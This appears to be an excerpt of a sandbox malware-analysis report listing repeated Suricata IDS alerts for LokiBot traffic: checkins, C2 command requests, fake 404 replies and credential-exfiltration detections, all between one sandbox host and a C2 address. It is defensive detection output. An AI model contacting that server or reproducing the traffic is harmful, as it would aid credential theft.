            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49787 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49787 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49745 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49749 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49794 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49787 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49749 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49794 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49745 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49745 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49759 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49751 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49794 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49745
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49733 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49788 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49806 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49800 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49755 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49800 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49800 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49794 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49749
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49806 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49733 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49806 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49794 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49755
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49787 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49845 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49845 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49787 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49740 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49751
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49738 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49738 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49759
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49806 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49806 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49788 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49845 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49788 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49733 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49864 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49864 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49738 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49845 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49845 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49806
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49738 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49738 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49834 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49845
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49869 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49869 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49735 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024312 - Severity 1 - ET MALWARE LokiBot Application/Credential Data Exfiltration Detected M1 : 192.168.2.4:49733 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49864 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49754 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49788 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49738
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49753 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49788 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49769 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49769 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49787
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49800 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49753
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49794
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49869 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49834
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49757 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49736 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49743 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49748 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49743 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49743 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49748
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49768 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49869 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49864 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49741 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49800 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49756
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49769 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49740
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49898 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49913 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49864 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49913 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49922 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49898 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49788
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49898 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49760 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49768 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49768 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49739 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49869 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49769 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49741 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49736
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49883 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49781 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49864
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49775 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49762 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49741 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49913 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49869
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49922 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49769 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49898 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49883 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49898 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49826 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49743
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49781 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49754
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49781 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49741 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49757
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49760
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49913 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.41:80 -> 192.168.2.4:49898
            Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49913 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49781 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49851 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49875 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49830 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49826 -> 94.156.177.41:80
            Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49883 -> 94.156.177.41:80
